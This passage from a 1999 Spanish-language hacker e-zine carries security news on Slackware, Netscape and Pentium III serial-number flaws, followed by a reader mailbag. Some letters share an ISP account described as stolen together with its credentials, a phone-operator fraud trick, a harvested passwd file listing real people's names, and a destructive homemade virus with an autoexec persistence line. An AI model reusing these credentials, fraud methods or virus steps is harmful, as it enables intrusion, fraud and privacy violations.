bastante claro que durante este periodo nos encontramos ante
una vulnerabilidad que se podría presentar, sobre todo, en
administradores noveles que no optaran por establecer la password
y configuraciones de acceso remoto en los primeros momentos.
En pruebas realizadas, en un entorno muy favorable al atacante,
se ha podido comprobar como es factible realizar el acceso remoto
antes incluso de que el usuario pueda interactuar localmente por
primera vez con el sistema. Esta vulnerabilidad es especialmente
peligrosa en el caso de la instalación remota a través de NFS,
donde es factible identificar los sistemas que están instalando
Slackware directamente a través del servidor NFS o mediante
análisis del tráfico. Utilizando estas técnicas es fácil
implementar utilidades que automaticen el ataque cuando se
detecten sistemas que comiencen la instalación de esta distribución.
La forma de evitar esta vulnerabilidad a la hora de instalar
nuestra distribución de Slackware pasa por utilizar sistemas
locales y evitar NFS. Deberemos mantenernos desconectados de
la red hasta que establezcamos una configuración segura, que
pasa por establecer de forma inmediata la password de root y
borrar las entradas ptty del fichero /etc/securetty para evitar
las conexiones remotas. Otras medidas pasan por deshabilitar,
si no son necesarios, los servicios de telnet y ftp en el
fichero inetd.conf y reiniciar inetd, de la misma manera que
es recomendable invalidar rlogin, rsh y rexec.
NUEVO BUG EN NETSCAPE COMMINICATOR
Un nuevo fallo de programación en todas las versiones de Netscape
Communicator 4.x puede permitir leer ficheros html locales,
consultar la caché y otros muchos problemas aun sin confirmar.
Georgi Guninski ha descubierto un nuevo agujero de seguridad en
Netscape.
El nuevo agujero lleva consigo muchas implicaciones, como la
lectura de ficheros html locales (consultándolos en la forma en
que el usuario los ve, no el código fuente). De la misma forma,
pueden leerse ficheros html en un servidor web bloqueado por un
firewall (si el navegador y el servidor web se encuentran en la
misma cara del firewall). El bug también permite acceder a los
contenidos de la caché del usuario, e incluso permite la
navegación y la consulta de los directorios del disco duro del
usuario, así como otros efectos que el propio Guninski no
termina de confirmar.
El fallo hace uso de la función find() de JavaScript, junto con
el tag ILAYER, lo que hace que también pueda desarrollarse a
través de un mensaje e-mail. Netscape ya ha anunciado que está
trabajando en un parche para remediar este problema, aunque como
solución temporal se recomienda deshabilitar el lenguaje
JavaScript.
SE DEMUESTRA LA VULNERABILIDAD DEL NUMERO DE SERIE DE LOS PENTIUM III
Tras todas las especulaciones producidas en torno al número de serie
incluido en los Pentium III, una compañía canadiense hace púbico un
programa que demuestra su vulnerabilidad.
El número de serie incluido en los Pentium III ha levantado una gran
polémica, pero hasta ahora nadie había conseguido demostrar públicamente
la posibilidad de conseguir dicho código. Zero-Knowledge Systems, una
compañía dedicada al desarrollo de aplicaciones para la privacidad en
Internet ha desarrollado un programa que obtiene el identificador a
través de la Red.
La compañía ha diseñado un pequeño programa ActiveX que es capaz de
saltarse la utilidad de control del controvertido Pentium Serial Number
(PSN) de Intel. Para demostrar la facilidad con que un atacante malicioso
puede activar o robar este código identificativo el control graba el
número en una cookie, todo ello aunque la utilidad de Intel informe de
que el PSN está desactivado.
Los usuarios de Pentium III pueden comprobar por sí mismos la
vulnerabilidad de la protección de Intel a través de la página
http://www.zks.net/p3. Aunque la compañía no ofrece aun el código fuente
del desarrollo, anuncia que en futuro próximo lo ofrecerá al público.
El control ActiveX se esconde en un banner publicitario, de tal forma
que cuando el usuario pulsa sobre él, el control simula un bloqueo del
ordenador. Pero al mismo tiempo se carga en el ordenador del usuario un
troyano diseñado para saltarse la protección de Intel. Al reiniciar el
ordenador se da la oportunidad al control ActiveX de grabar el número
de serie en una cookie para cualquier uso posterior.
Esta información sale a la luz justo el mismo día en que Intel ha
reconocido que una serie de Pentium II para portátiles también incluyen
el número de serie, lo que sin duda aumentará la
polémica en torno a este tema en los próximos días. La compañía había
incluido el PSN de forma imperceptible en una línea de sus procesadores
PII para notebooks, como una forma de evaluar el proceso de fabricación
para el futuro Pentium III. Aunque esta circuitería era desactivada
antes de abandonar la fábrica, una de las líneas falló en dicho proceso,
con lo que salió al mercado el código activo.
Mate Swichman
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
#########################
ø ø
ø 19.-HA LLEGADO MAIL ø
ø ø
#########################
_______________________________________________________________ By Proyecto_R
Ok, antes que nada quiero decirles que esta seccion sigue creciendo, y que
por muy ocupados que estemos, los correos llegan a todos los miembros de
CDLR, asi que si por algun motivo alguno de nosotros no puede responder
a sus mensajes otro integrante del grupo si lo hara, no les echo mas carreta
y vamos con lo que ha llegado , talvez muchas respuestas que encuentres en
esta seccion son las mismas o mas completas que las que han llegado a sus
casillas ya que hemos tratado en la medida que se pueda , responder a
vuestras inquietudas apenas recibimos tu email :
PD: esta seccion se ha visto reducida gracias a la marvaillosa gestion
de PlaXiuS que al hecharse su HDD , habra perdido unos 30 correos ....
****************************************************************************
-----Mensaje original-----
Subject: quiero linux
Date: Tue, 6 May 1997 21:48:41 -0600
From: "x"
To: <
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
>
primero que nada quiero dales mis musras de admiracion por tan
noble campaña y por su magifico e-zine..que me ha motivado a
aprender lo que mas pueda y dejar de ser un lamercillo de
mierda..ojala respondas pronto y me digas como lo tengo que hacer
para obtener una copia de esta distribucion de linux te comento
que soy de stgo
de paso me pongo a su dispocicioon para lo que pueda ayudar
traducciones...programas....etc....
[TKR: Amigo, primero que nada creo que debes cambiar la fecha que tiene
tu pc, o sera que no quieres que llegue al 2000 por que no lo aguantara
Segundo, gracias por tus comentarios acerca de nosotros, y sobre lo de
lamercillo de Mierda, pues si vos te consideras asi alla tu, pero dejame
decirte que solo por ser nuevo en esto no te puedes considerar un lamer
yo diria que mas bien eres un Newbie como yo.
Para lo de Linux, pronto estaremos informando como se hara la entrega
la idea es que el que este mas cerca de ti lo mande a tu direccion...
y para las colaboraciones, aqui estamos esperando...]
****************************************************************************
-----Mensaje original-----
Subject: MKLINUX TEAM
Date: Tue, 6 May 1997 21:50:24 -0600
From: "x"
To: <
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
>
puedo colaborar con 10 cds...virgenes
[TKR: Ok, pronto nos pondremos en contacto para ver como va a funcionar
la recoleccin de las donaciones, pero antes que nada quiero aclarar
que son voluntarias, para que despues no anden por ahi diciendo que los
CDLR esto o aquello...]
****************************************************************************
-----Mensaje original-----
Subject: y los programas?
Date: Tue, 6 May 1997 22:09:28 -0600
From: "x"
To: <
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
>
trate de bajar todas las tools pero decia que la pagina ya no
existe ,cuando estaran disponibles?
[TKR: Como puedes ver ahora, la pagina ha estado siendo modificada,
pero la verdad hemos tenido tantos problemas de tiempo y esas cosas
que no ha quedado, lista del todo, pero pronto estara, y con el nuevo
server que viene en camino, podras encontrar muchas mas cosas
interesantes...]
****************************************************************************
-----Mensaje original-----
Subject: Grupo!!!
Date: Thu, 11 Feb 1999 19:42:28 PST
From: "Exodus Exodus"
To:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
Hola Plaxius:
Te mando este e-mail pa decirte que pasa con el grupo!!!
Tb podria ser el mismo grupo y que traten todos de hackear a algun
server en comun, que se comparta la info pa todos no pa los
especiales como hay algunos:)...
Que se compartan shell etcc para hackear algun server etcccc
chaoo resp por fa
[TKR: Hackear, nosotros...???, parece que ultimamente se nos ha ido la
mano a la hora de perder el contacto, pero a veces si se nos ocurren
esas ideas, ya veremos que se hace al respecto...
A que te refieres con eso de especiales...???, upss, creo que estoy
cometiendo algun delito, pues lei correspondencia de PlaXiuS.]
[PLX: TAkER estas arrestado por leer correspondencia ajena jejeje]
****************************************************************************
-----Mensaje original-----
Subject:
Date: 12 Feb 99 16:08:00 America/Knox_IN
From: some one
To:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
Hola Como Estan dudez :
como les ha ido
oigan, les queria decir que todo va muy bien
somos 2 no mas pero seguro que van a salir otros mas
,ademas debo dsecirles que el ciber que hay es mas charcha que la mierd@
y mejor nos juntamos en un cafe asi ni mas .
sobre los cd´s de linux
tenemos una matriz de slackware.
bueno eso es todo .
adios amigooos....
[TKR: Pues hasta el momento nos ha ido muy bien, gracias por preguntar.
Nosotros somos cuatro y la verdad no sabemos si alguien mas se quiera
incorporar, pueden enviar sus hojas de vida a esta misma direccion, con
todos sus datos, deben indicar la aspiracion salarial y bla bla bla...
De que ciber hablas, a ver si nunca voy por alla...
Slackware, ok, me gusta...pero tenes algun quemador de cds disponible.?]
****************************************************************************
-----Mensaje original-----
Subject:
Date: 13 Feb 99 15:26:34 America/Knox_IN
From: some one
To:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
hola
una nueva cartita
hoLaZ:
CoMo EsTan les gUsTaron lAS fOtoS que lEs mandE deL grUpO ??
BonITAS No??
[TKR: Pos las fotos si, muuuy bonitas, pero la verdad me hubiera
gustado mas que enviaras la de alguna nena pues todavia no me empiezan
a gustar lo hombres y creo que cuando lo haga me tirare de cabeza desde
el piso 23 donde trabajo.]
oiGAN , reCiEN NO LeS pUde eScRibIR ToDo . aCI Ke
les aPrOVecHo DE dECiR qUe eL ciBeR QUE yO DEciA
vaLe HOngO , En SErIO HAY 4 PC´S Y 10 siLLaS , aDEmas
nO HAY cAfE!!!!
Y CuESTa 2600 LA HORa (Pero A 64K CoNExIOn dediCADa)
aSI Que MeJOr NoS VAmOs a TeMneR qUe jUNTaR EN un pUb O algo AsI.
bUEnO ,UsTeDes VeRaN QUe EN el InFOrME 1
SaleN TREs TiPOS peRO DeCiDIMis EcHAr a BlacK PoRQue
No aPOYAbA EN nA Y LLEnAbA lA BoCA , cOn qUE erA
hAcker Y cUStioNeS aSI , haStA uNOs vECiNos
NoS ReTARoN POr cuLpa del jeToN.
bUEnO aSi qUe SoMos solO 2 pERo no Me IMPoRTa
Ya lLegAran MAs.
[TKR: Buena decision, eso de andar haciendo pantalla de lo que podes
hacer no es buena cosa, y menos si eso que decis te mete en problemas,
asi que no importa que sean dos, sigan adelante que lo que no sirve
estorba.]
oIgaN LES guSTA La prESEntacioN De las LeTRas arRIba Y AbaJo??
LES maNDo eL sOftWaRE PegaDo PA QUe HaGAn Lo MisMo.
HA y otRa CoSa visItaroN LA pAGiNA????
(htTP://paGiNa.dE/OzOno2)
La suBI a LA BRujULa !!!
si y FunCiOnA .
[TKR: Pues a ver lo de las letras ArIbA Y AbaJo quita mucho tiempo, eso
de andar cortando y pegando no me gusta mucho que digamos, mejor lo
dejo para cosas importantes como el PGP, y que paso, creo que se te
olvido enviar el attach, por que el programejo nunca llego...
La Pagina, si pase por ahi, pero todavia le faltaban un resto de vainas
asi que lo dejo para otra ocasion, mejor me avisas cuando este terminada
vale...???]
AHOra MIsMo esTOY hacioNdO El el rESto de La pAgIna
DOWlOADs , HackS y lo dE AGro RocK.
BuENo Sin maS Que dECIR Ha Si , LeS maNdo nUESTraS fOTOS
eL ruBIo es BoStA Y El moreno yo kOKan
pARe C qUe lLa lEs Habia ManDaDo mi fOto??
No SE PerO = sE laS manDo.
A Y maNDeNme uN MaIL Pa conTarme CoMO va LO DEl serVER poh
BUeNo AdIOS...
pd: eL Irc dE ReUNa eStA mAlo??, o sera que me kagaron??
PaRe QuE un tipo ME blOqUEO lA Entra Por wéa , DeJE a un PriMO eN
eL TeClAdO y el wEoN SE pUSO a NUKeaR y mAtar gueoNeS DEL CAnAL #chILe
cON Mi nicK, iguAl Mi tIO LO rEto PERO a MI aHORa ME Van a KAgAR
SIempRE.
bueNO sI conOcEN A aLgunOs TipOs qUE SupuestameNTe aTaKE
pidAnlE mis dIsCUlpas (Y qUE NO LeS puedo MaNDAR lAS boLAS de
mI priMo pOR cORrEO .....)
(.PorQUe se lAS dI aL perrO)jAJAjAja!!!
---------------------------------------------------------------------
[TKR: Como se te ocurre dejar a un lamercillo de Mierda frente al
teclado de tu PC y ademas con tu NICK...??? ahh, eso si es
imperdonable.
Pero bueno, si alguien del canal lee estas lineas ya sabe que fue lo
que paso (o lo que dice kOKan que paso...XDD uno nunca sabe.]
[PLX: COnsejo .. Arreglen el Caps Locks de ese teclado jejeje]
****************************************************************************
-----Mensaje original-----
Subject: Hola AMIgos
Date: Sat, 13 Feb 1999 18:21:00 -0800 (PST)
From: Jorge Robledo
To:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
Hola amigos:
bajé el archivo de la pifia de entel, y me resultó una vez, ya que las
operadoras dicen que sólo conecta via enteltiket y cobro revertido. y
lo que yo queria era que pasaran la llamada directa como si yo pagara.
Me la tuve que engrupir diciendo que el boton 2 del telefono estaba
malo y que por eso no podia marcar via 123 y queria que ella me
marcara, y me funcionó.
Hablando de fonos 800 de inet:
Yo me conseguí una cuente de interacces que funcionaba en el telefono
800210226 y el username y password eran vmc.
Esta cuenta funciono entre marzo/abril del 98, y de repente no me pude
conectar mas porque sonaba ocupado.
Mande un mail al soporte de interacces y me los engrupi para que me
dieran en telfono de conexion , me dieron el 600 310 10 11
me conecté por un tiempo pero tampoco me funciona ahora.
Resulat que yo no pago por internet, o sea, me consigo cuentas con
amigos y cambiamos. A uno que yo le dí esta cuenta lo llamaron de
interacces y lo amenazaron porque esta cuenta fue robada por un
hacker, y pensaron que e´l era.Rastrearon su telefono.
Bueno de interacces se que existen otros numeros 800, porque conozco
un gallo que vende cuentas 800 de interacces a 5 lucas, pero nunca le
he pagado. Pero existen.Hay que encontrarlas.
Si tienes alguna informacion de otras o de otro numero 800 de
interacces, dime ya que esta cuenta supomgo que todavia funcionaria.
Bueno amigo, yo solo soy un newbie, y si quieres compartir
informacion, estaré esperando.
Se despide:
swatch.....de Viña del mar
a proposito, me encanta la idea que tuvieron de unirse hackers
chilenos y poner una pagina, ya que para buscar informacion , solo
encontraba paginas de gringos.
Si saben donde conseguir Linux, avisenme.
[TKR: Si alguno de ustedes AndyK o PlaXiuS puede responder este se los
agradezco pues desde Colombia me queda como jodido ponerme a escanear
lineas chilenas...
Lo del Linux, ya debes haber oido hablar de Nuestro proyecto no...?]
[PLX: Creo que el AnDyK anda en esos scaneos ademas de algunos chicos
de Underchile .. si sale algo les aviso ahh y lo de entel sip
terminaron arreglando el problemita ]
****************************************************************************
-----Mensaje original-----
Subject: queremos una paleteaa
Date: Sun, 14 Feb 1999 04:58:54 +0100
From: "Fox, Crackx, Caco_cst, Chino"
To:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
somo un grupo nuevo de hacking; ACCION_X, les queriamos solisitar su revista
para ponerla en la seccion de textos de nuestra página
( http://members.xoom.com/AccIoN_X)
ESPERAMOS SU RESPUESTA a:
accion_x@xxxxx
[TKR: Adelante, no hay problema, siempre y cuando no modifiquen ningun
texto, y si lo hacen mencionen su fuente...]
[PLX: Bueno que mas que saludos y que sigan pa delante no mas ]
****************************************************************************
-----Mensaje original-----
Subject: como?
Date: Fri, 19 Feb 1999 00:07:59 PST
From: jeikill1@xxxxx
To:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
encontre un server con el 79 abierto y con anonymous activado...hice el
procedimiento que sale en la r1 y r3 pero jhon no encuentra nada ...no se si
lo estoy usando mal o no pero como puedo conseguir la maldita cuenta del
root..?...que otras cosas puedo hacer desde windows con este servidor?
por favor help...no se como comenzar
ATTP
Mr haid..
[TKR: Puerto 79, me suena al Finger, y lo de anonymous me suena a FTP
creo que estas revolviendo las cosas, a ver te lo explico de forma
rapida, el 79, lo puedes utilizar para obtener datos de las cuentas
existentes en el server, y el anonymous en el FTP, pues no te sirve de
mucho, a no ser que el sistema este mal configurado y te deje escribir
en sus directorios, si es asi lo puedes utilizar como FTP para Warez...
solo es una opcion yo no se mucho de eso...XDDD]
****************************************************************************
-----Mensaje original-----
Subject:
Date: Fri, 19 Feb 1999 17:31:07 PST
From: jeikill1@xxxxx
To:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
hola de nuevo...espero que no se rian de mi pregunta...bueno wherever
1.-¿es necesario tener el mismo sistema operativo que el servidor al cual
quiero entrar(ejemplo si tiene unix v se puede entrar si yo teno por ejemplo
linux)?
[TKR: No, no es necesario tener el mismo sistema operativo, pero si
es necesario conocer mucho el sistema operativo del server que
vas a hackear...]
2.- ¿cual sistema operativo me sirve mas para el hack y don de lo consigo?
[TKR: Has oido hablar del Linux...???]
3.-¿como uno sabe si lo que a conseguido a sido un fichero de passwords que
john the... u otros puedan crackear?(por ejemplo si uno lo edita con
wordpadd que se veria?
[TKR: Se veria algo muy parecido a lo que pegaste en el punto siguiente]
me consegui un supuesto fichero que no se si lo es realmente ,podrias
decirme lo que significa,editado en wordpadd es mas o menos asi:
root:x:0:1:0000-Admin(0000):/:/sbin/sh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
setup:x:99:1999:Netra Administrator:/export/home/setup:/bin/ksh
gopher:x:101:1::/export/home/gopher:/bin/sh
ftp:x:30000:30000:Anonymous FTP:/export/home/ftp:/bin/false
infotrad:x:102:2000:Infotrade:/export/home/infotrad:/bin/sh
sidicom:x:103:2000:Sidicom:/export/home/sidicom:/bin/sh
jsalinas:x:104:2000:Jorge Salinas C.:/export/home/jsalinas:/bin/sh
hmeneses:x:105:2000:Hernan Meneses R.:/export/home/hmeneses:/bin/sh
cvalenzu:x:106:2000:Carlos Valenzuela V.:/export/home/cvalenzu:/bin/sh
julloa:x:107:2000:Jaime Ulloa D.:/export/home/julloa:/bin/sh
dicom:x:108:2000:Dicom S.A.:/export/home/dicom:/bin/sh
lgodoy:x:110:2000:Lorena Godoy:/export/home/lgodoy:/bin/sh
csantiba:x:111:2000:Cristian Santibanez V.:/export/home/csantiba:/bin/sh
[TKR: Has leido los numeros atrazados de Proyecto R...???
Si tu respuesta es no: Pues ve y leelos...
Si tu respuesta es si: Estas seguro que los leiste...???
Si tu respuesta es no: Pues ve y leelos...!!!
Si tu respuesta es si: Estabas poniendo atencion a lo que leias...???
Si tu respuesta es....ya me canse...]
4.-¿como es eso de usar los bug como se usan ,donde se ponen como los
activo..ect?
[TKR: Has leido los numer.....]
espero no ser molesto...
saludos
Mr.HAid
[TKR: No, para nada...solo sigue leyendo...]
****************************************************************************
-----Mensaje original-----
Subject: J.Î.T.
Date: 20 Feb 99 16:39:39 MET
From: Nikon "Jane´s" murphy
To:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
Hiz , somos un grupo llamado J.Î.T. (Joventut Înformàtica Terrorista)
De habla hispana, y trabajamos con la misma finalidad con la que trabajais
vosotros....
nuestra URL és =>
http://www.geocities.com/area51/dungeon/9716/joventut.html
E-Mail:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
si alguno de los files no se baja és pq todavia no hemos reestablecido la
pàgina ya que tuvimos algunos problemillas...;)
si necesitàsseis dudas o kualkier kosa podeis kontar kon nosotros,
nos ha gustado vuestra page..web, i creemos que lo del proyecto està bastante
bién......
Saludos cordiales: L0RÐ_Nikon253 & C0DEX.
byez.
[TKR: Terroristas...???, solo espero que la finalidad que ustedes tienen
no este implicita en el nombre de su grupo... ;)]
[PLX: BRAZILLL la la la la laaaa .. siempre me he preguntado si lo
brasile¤os inventaron SAMBA XDD (samba de Linux .. si ese pa conectar
a boxes 95)Bueno un saludos a los GAROTOS !!!]
****************************************************************************
-----Mensaje original-----
Subject: Ozono en accion
Date: Sat, 20 Feb 1999 21:06:50 +0100
From: "Kokan_killer"
Organization: Ozono+2
To:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
hola como estan les mando nuestro primer viruz
espero que fub}nciomn
HOla Dudez:
Con mucha alegria les presentamos nuestro virus x23
es super basico , tiene algunos problemas , de hecho es
tan basico que lo hicimos en Basic , sip es indetectable
borra los archivos autoexec.bat y el directorio windows
(como esta compilado en lenguaje de maquina no pregunta
si realmente lo quiere borrar o bla bla , solo los borra)
el unico problema es que no parece virus , es un programa
(malo realmente.)
ahora. la solucion seria hacer otro programa que copyara
el archivo noname.exe (el virus) al directorio de Raiz , y escribiera
esta linea al final de autoexec.bat
c:\noname.exe
cre que se puede hacer , porque el programa de instalacion de
las sound blasters y otros mas modifican el autoexec , el unico
problem es que ninguno de nos le pega mucho a la programacion
y por eso no podemos hacer lo de las lineaz , si uds pudieran
ayudarnos seria la Raja , porfa el codigo fuente del virus es
re corto , lo hicimos como en cinco minutos y no es chiste
lo que pa es que lo hicimos en el power basic y con el libro
de usuario de gw-basic (lo compramos de una libreria de libros usadoz
hehe)
pero igual funka , me hecho a perder un computador a mi (kokan)
y casi nos echamos un noteboock de tecnopolis del mall del centro .
pero = me gusto la idea de hacer viruZ
bueno dudez esto es una muestra de que estamos ocn el hombro puesto
como dicen ust3dez , les hemos mandado caleta de mails y no contestan
ni uno , yo creo que es porque no han podio , ojala asi sea .
bueno se desapiden sus dudez de ozono+2
hasta ahora somoz 4 boyz
kokan,bosta,dreay Dud
[TkR: Pues que decir, no seria mas facil hacer un bat que haga lo mismo
ademas, que gracia tiene un virus que borre el directorio del Guin y
encima borre el autoexec.bat...???, creo que si quieren hacer virus
deben estudiar ASM y no GW-BASIC. Aqui estamos respondiendo todos (o
casi todos los mails que nos han enviado), y ya saben, a estudiar ASM.]
****************************************************************************
-----Mensaje original-----
Subject: Felicitaciones
Date: Sun, 21 Feb 1999 00:33:36 -0300
From: Gonzalo
To:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
Hola Proyecto_R,
Mi líneas son para felicitarlos, gran esfuerzo...
El mundo de los curiosos tiene otra fuente de inspiración y
aprendizaje.....
Felicitaciones otra vez.
Voy en el e-zine 4 y estoy muy contento de saber de Uds. Una sola
duda, quise incorporarme a su lista de correo para recibir los
artículos y me llevo a una página que ya no me acuerdo
(perdón,www.egroup.com, casi seguro) Uds manejan en envío de mensajes
por intermedio de ese servidor? Me llegarán junto a sus artículos
otras cositas no deseadas?
Eso por ahora
Espero respuesta, pensando que no están tan ocupados, aunque asumiré
que si no lo haces es que les va muy bien, y que están trabajando
arduamente para ayudarnos a satisfacer nuestra curiosidad y ansias de
conocimientos......
Salu2,
Gonzalo
[TkR: Creo que hablas de www.egroups.com pos si, desafortunadamente
esa gente como que manda muchos mails indeseados, ya veremos que se
hace...y gracias por apreciar nuestro esfuerzo.]
[PLX: Olvida esa lista la tenemos que eliminar .. ya que son unos
spammers de mierdd..... ]
****************************************************************************
-----Mensaje original-----
Subject: pagina web con link mal escrito
Date: Sun, 21 Feb 1999 04:08:30 -0500
From: "Tasslehoff" <
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
>
To: <
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
>
Hola amigos de proyecto R
El otro dia navegando por la red encontre un pequeño fallo en la pagina de:
http://www.geocities.com/Colosseum/Sideline/9497/index2.html. La direccion
que estaba tras el logotipo de J.J.F. Hackers Team (logotipo de
distribuidores oficiales) situado en la parte superior derecha, contenia un
fallo importante: tiene asignada la direccion http://www.jff.org en lugar de
http://www.jjf.org figese que si bien en la primera hay DOS eFes en la
direccion real solo hay UNA eFe.
Atentamente:
Tasslehoff
- J.J.F. / Hackers Team -
http://www.jjf.org
[TkR: Upsss, PlaXiuS ya debe haberse encargado de eso...gracias por
el comentario... ;)]
[PLX: Upps .. tu lo has dicho TAkER a penas llego lo corregi. Se caen
los aviones ....]
****************************************************************************
-----Mensaje original-----
Subject: tools
Date: Tue, 23 Feb 1999 01:43:47 -0400
From: "DarKdEaTH"
To: <
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
>
un comentario rapidito, quería ver ke tal era ese ipspoofer para win pero no
está, el link está roto y creo ke todas las demás herramientas también, te
lo digo por si nadie te lo había dicho, por cierto de donde sacastes ese
spoofer he estado buscando sin ningún resultado satisfactorio, bueno eso era
todo, nos vemos por ahi.
^^DarKdEaTH^^
http://www.venkiller.org/cuevadark
Hackers Venezuela
http://members.xoom.com/hven
#Hackers-Venezuela en dalnet
[TkR: Por si no te has dado cuenta estamos en remodelacion, y todos esos
fallos seran solucionados si es que NO fueron resueltos ya...ahh, y ahora
que estas por aca quiero preguntarte una cosilla, que requisitos hay que
llenar para poder formar parte de la lista de correo de
Hackers-Venezuela...???, creo que deben ser muchos, pues llene las tres
paginas que piden uds, y aun asi...me negaron la entrada...!!! :-( ]
****************************************************************************
-----Mensaje original-----
Subject: [Fwd: Hola Arkagnet]
Date: Wed, 24 Feb 1999 19:07:14 -0400
From: kion
To: Proyecto_R <
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
>
Bueno, PlaXiuS me encuentro super bien; ))))), y tu, con gusto te vuelvo
a enviar el Proyecto_r3 de nuevo, pero te achantas un poco ya que todovia
estoy rulando con un poco de trabajo(que le cuesta a este darle un click a
send), bueno no es eso el archivo lo delete, pero me quede con los .html y
simplemente lo que tengo que hacer es compilar y esperar y listo.
Ah!, he visto que en las otras e-zines, como RazaMexicana y otras
e-zines, que incluyen articulos sobre electronica y mas, me gustaria incluir
algo de esto, pero mis conocimientos de electronica son bagos, bueno ya
veremos.
Un Cordial Saludo!
[TkR: Aunque este coreo era para PlaXiuS, dejame decirte que puedes
enviar tus articulos sobre electronica ya que lo que importa es que
ensenien algo de tecnologia...y como bien lo hemos dicho muchas veces
no somos expertos aun y por algo hay que empezar]
****************************************************************************
-----Mensaje original-----
Subject: solicitud
Date: Wed, 24 Feb 1999 22:27:12 -0600
From: kazzan@xxxxx (Worm Tresspasser)
To: <
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
>
Me presento...soy un joven de Chile y me interesa aprender el arte del HACK
, tal como dijo PlaXius "ES COMO UNA PESCA DEPORTIVA", PUES BIEN , necesito
que me guien en esto que pretendo comenzar, .....por lo pronto algo
sé...especificamente necesito saber como ocultar mi IP , como decodificar
ficheros (john the ripper), en fin.
Le tengo una noticia a PlaXius....tengo el fichero PASSWD que tanto
busca...lo encontré en www.gamesdomain.com, pero.....esta codificado...por
favor no quiero quedarme en Lamer o novatillo.
Se despide un esperanzado lector de sus boletines.
Pueden Comunicarse conmigo en
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
Ciao !!
[TkR: Como ocultar tu IP...mmm, tal vez lo que quieres decir es como
deshacerte de los fastidiosos log que quedan en los servers...o hacerte
pasar por una IP diferente...bueno, eso es facil...aprende bastante
sobre el sistema operativo donde quieres que tu IP no aparezca, y lo
del ficheros passwd, lee los numero anteriores...]
****************************************************************************
-----Mensaje original-----
Subject: H_C_VEGETA
Date: Wed, 24 Feb 1999 22:45:00 PST
From: "vegeta shampoo"
To:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
Plaxius:
Hola soy H_C_VEGETA, Me di la libertad de colocar informacion sobre
la primera junta Under desentralizada de americalatina.... en mi pagina,
puse que era sobre el proyecto R.
Si no te agrado la idea que alla puesto eso, enviame un e-mail
a todo esto, la proxima vez que nos veamos te devuelvo la plata (400)
tambien gracias por los textos, y tambien quiero mi distribucion Linux.
http://members.xoom.com/H_C_VEGETA/
nos vemos
bye
=H_C_VEGETA=
[TkR: Pues creo que con eso del UnderdrinK no hay problema, pues
mientras mas gente lo sepa mas rapido se podra organizar...
y lo de la plata, eso si te toca arreglarlo con PlaXiuS.y como el
mail que sigue tambien es tuyo, te agradezco por adelantado la caja de
CD's...]
[PLX: Viva la Shampoo de Ranma 1/2 .. ta rika jeje bueno espero que
te haya gustado la pizza el otro dia en la casa .. ahh y todavia toi
esperando la caja de CDs .. bueno para que todos sepan .. este ni¤ito
arraso con mis coleccion de textos jajaja me dejo pelado ]
****************************************************************************
-----Mensaje original-----
Subject: Aqui voy :-|Ahhhhhhhh!
Date: Sat, 27 Feb 1999 15:39:15 -0400
From: kion
To: Proyecto_R <
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
>
Bueno. aqui te envio tu Proyect_R3, y tambin te envio el texto
traducido de la creacion de virus bajo entorno Windows, Ah! me
preguntaba si me prodrias ayudar a instalar Linux, si tener que borrar
el windows, ya que mi work depende de esto(que fiebra con linux no!). Y
como siempre si hay un problema por fa´ avisame.
Una preguntica compa, la otra vez me meti en una web de mi pais y al
escribir la cadena que estaba destinada a busqueda le di enter y me
salio un archivo que descargue a mi computer }:-(, tambien se los
envio. Creo que dicho archivo es el cgi, el programa que se ejecuta en
el server hacer la busqueda en su base de datos.
Un Cordial Saludo!
;-)))))))))))))))))))
[TkR: Pues con lo del Linux, creo que debes usar el Partition Magic, o
el FIPS, pero la verdad a mi el FIPS nunca me funciono...o si prefieres
te consigues un disco adicional y puedes seguir trabajando con tu
Guindows sin problema...
Y el archivo "CGI.exe" que bajaste, es simplemente una pagina html, si
le cambias el nombre a CGI.html" veras lo que dice...
Saludos a vos tambien...]
****************************************************************************
-----Mensaje original-----
Subject: Proyecto...
Date: Sun, 28 Feb 1999 16:55:00 -0400
From: Ignacio
To:
